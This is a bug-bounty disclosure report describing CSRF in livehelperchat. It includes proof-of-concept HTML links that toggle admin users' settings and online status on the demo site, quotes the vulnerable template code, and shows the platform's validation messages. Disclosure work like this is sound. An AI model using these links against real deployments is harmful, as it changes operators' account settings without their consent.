Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat
Valid
Reported on
Dec 14th 2021
Description
CSRF in switching between enable and disable of the following:
- Dark/bright
- Auto uppercase sentences
- Do not scroll to the bottom on chat open
- Auto preload previous visitor chat messages
- Load previous message on scroll
- New messages
- New chats
- Online
- Based on activity
- Visible
Proof of Concept
<a href="https://demo.livehelperchat.com/site_admin/front/switchdashboard/(action)/mode">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_uppercase/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/no_scroll_bottom/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_preload/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/scroll_load/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/chat_message/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/new_chat_sound/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setoffline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setalwaysonline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setinvisible/true">CLICK ME!</a>
Impact
This vulnerability is capable of tricking users to enable/disable personal settings on their accounts.
Occurrences
user_box.tpl.php L85
- Auto preload previous visitor chat messages
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/auto_preload/<?php echo erLhcoreClassModelUserSetting::getSetting('auto_preload',0) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('auto_preload',0) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Auto preload previous visitor chat messages');?></a>
user_box.tpl.php L30
- Dark/bright
<a title="<?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('chat/user_settings','Toggle between dark and white themes');?>" href="<?php echo erLhcoreClassDesign::baseurl('front/switchdashboard')?>/(action)/mode" class="dropdown-item pl-2"><span class="material-icons">settings_brightness</span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('pagelayout/pagelayout','Dark/bright');?></a>
lh.js L3419
New chats
lh.js L3401
New messages
user_box.tpl.php L79
- Auto uppercase sentences
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/auto_uppercase/<?php echo erLhcoreClassModelUserSetting::getSetting('auto_uppercase',1) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('auto_uppercase',1) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Auto uppercase sentences');?></a>
user_box.tpl.php L88
- Load previous message on scroll
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/scroll_load/<?php echo erLhcoreClassModelUserSetting::getSetting('scroll_load',1) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('scroll_load',1) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Load previous message on scroll');?></a>
user_box.tpl.php L82
- Do not scroll to the bottom on chat open
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/no_scroll_bottom/<?php echo erLhcoreClassModelUserSetting::getSetting('no_scroll_bottom',0) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('no_scroll_bottom',0) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Do not scroll to the bottom on chat open');?></a>
We are processing your report and will contact the
livehelperchat
team within 24 hours.
a year ago
KhanhCM modified the report
a year ago
We have contacted a member of the
livehelperchat
team and are waiting to hear back
a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
user_box.tpl.php#L88
has been validated
user_box.tpl.php#L79
has been validated
user_box.tpl.php#L85
has been validated
user_box.tpl.php#L30
has been validated
user_box.tpl.php#L82
has been validated
lh.js#L3419
has been validated
lh.js#L3401
has been validated
to join this conversation